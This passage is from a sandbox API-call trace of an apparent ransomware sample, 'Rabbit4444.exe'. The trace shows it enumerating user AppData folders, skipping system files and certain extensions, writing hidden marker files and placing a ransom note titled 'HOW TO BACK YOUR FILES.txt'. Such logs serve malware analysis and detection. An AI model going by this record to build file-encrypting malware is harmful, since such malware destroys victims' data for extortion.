(lpString1="container.dat", lpString2="..") returned 1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0069.237] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0069.237] lstrcpyW (in: lpString1=0x130ebf4, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0069.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\container.dat", dwFileAttributes=0x2022) returned 1 [0069.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\container.dat", dwFileAttributes=0x2006) returned 1 [0069.238] lstrlenW (lpString="container.dat") returned 13 [0069.238] lstrlenW (lpString="Rabbit4444") returned 10 [0069.238] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0069.238] lstrlenW (lpString=".dll") returned 4 [0069.238] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0069.238] lstrlenW (lpString=".lnk") returned 4 [0069.238] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0069.238] lstrlenW (lpString=".ini") returned 4 [0069.238] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0069.238] lstrlenW (lpString=".sys") returned 4 [0069.238] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0069.238] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc2b47205, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2b47205, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2b47205, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0069.238] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0069.238] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0069.238] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0069.240] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0069.240] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0069.240] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.240] CloseHandle (hObject=0x29c) returned 1 [0069.240] CloseHandle (hObject=0x228) returned 1 [0069.240] GetCurrentThreadId () returned 0xd98 [0069.240] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0069.240] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache" [0069.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1232c0 | out: hHeap=0xe0000) returned 1 [0069.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0069.240] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache" [0069.240] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\" [0069.241] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0069.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0069.243] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0069.249] FlushFileBuffers (hFile=0x228) returned 1 [0069.249] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0069.250] CloseHandle (hObject=0x228) returned 1 [0069.250] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache") returned 91 [0069.250] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.250] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x1bf62139, ftLastAccessTime.dwHighDateTime=0x1d4ae7c, ftLastWriteTime.dwLowDateTime=0xf297601b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0069.250] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.250] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.250] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0069.250] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.250] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x81593ae3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x1bf62139, ftLastAccessTime.dwHighDateTime=0x1d4ae7c, ftLastWriteTime.dwLowDateTime=0xf297601b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.250] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.250] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.250] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0069.250] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.251] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.251] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf297601b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf297601b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf299c1fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0069.251] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.251] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0069.251] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc34d08bd, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc34d08bd, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc34d08bd, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0069.251] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0069.251] lstrcpyW (in: lpString1=0x130ebf0, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0069.251] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\container.dat", dwFileAttributes=0x2022) returned 1 [0069.251] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\container.dat", dwFileAttributes=0x2006) returned 1 [0069.251] lstrlenW (lpString="container.dat") returned 13 [0069.252] lstrlenW (lpString="Rabbit4444") returned 10 [0069.252] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0069.252] lstrlenW (lpString=".dll") returned 4 [0069.252] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0069.252] lstrlenW (lpString=".lnk") returned 4 [0069.252] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0069.252] lstrlenW (lpString=".ini") returned 4 [0069.252] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0069.252] lstrlenW (lpString=".sys") returned 4 [0069.252] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0069.252] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc34d08bd, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc34d08bd, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc34d08bd, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0069.252] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0069.252] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0069.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0069.253] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0069.253] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0069.253] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.253] CloseHandle (hObject=0x280) returned 1 [0069.253] CloseHandle (hObject=0x228) returned 1 [0069.253] GetCurrentThreadId () returned 0xd98 [0069.253] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0069.253] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache" [0069.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1235c0 | out: hHeap=0xe0000) returned 1 [0069.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0069.253] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache" [0069.253] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\" [0069.253] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\.BFC0E91B00AE8A0620D3" [0069.253] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0069.255] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0069.257] FlushFileBuffers (hFile=0x228) returned 1 [0069.258] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0069.265] CloseHandle (hObject=0x228) returned 1 [0069.266] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache") returned 90 [0069.266] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.266] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc23ad9f8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd01f6699, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf299c1fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0069.266] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.266] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.266] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0069.266] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.266] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc23ad9f8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd01f6699, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf299c1fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.266] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.266] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.266] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0069.266] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.266] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.267] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf299c1fc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf299c1fc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf299c1fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0069.267] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.267] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0069.267] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc23ad9f8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc23ad9f8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc23ad9f8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0069.267] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0069.267] lstrcpyW (in: lpString1=0x130ebee, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0069.267] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\container.dat", dwFileAttributes=0x2022) returned 1 [0069.267] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\container.dat", dwFileAttributes=0x2006) returned 1 [0069.267] lstrlenW (lpString="container.dat") returned 13 [0069.267] lstrlenW (lpString="Rabbit4444") returned 10 [0069.267] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0069.267] lstrlenW (lpString=".dll") returned 4 [0069.267] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0069.267] lstrlenW (lpString=".lnk") returned 4 [0069.267] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0069.268] lstrlenW (lpString=".ini") returned 4 [0069.268] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0069.268] lstrlenW (lpString=".sys") returned 4 [0069.268] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0069.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc23d3cb7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf8c607c0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf8c607c0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE77EECT", cAlternateFileName="")) returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="Rabbit4444.exe") returned -1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2=".") returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="..") returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="windows") returned -1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="bootmgr") returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="pagefile.sys") returned -1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="boot") returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="ids.txt") returned 1 [0069.268] lstrcmpiW (lpString1="IE77EECT", lpString2="NTUSER.DAT") returned -1 [0069.268] lstrcpyW (in: lpString1=0x130ebee, lpString2="IE77EECT" | out: lpString1="IE77EECT") returned="IE77EECT" [0069.268] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT", dwFileAttributes=0x2012) returned 1 [0069.268] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0069.268] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116860 [0069.268] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x11d048 [0069.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc23d3cb7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf8c607c0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf8c607c0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE77EECT", cAlternateFileName="")) returned 0 [0069.268] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0069.268] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0069.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0069.270] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 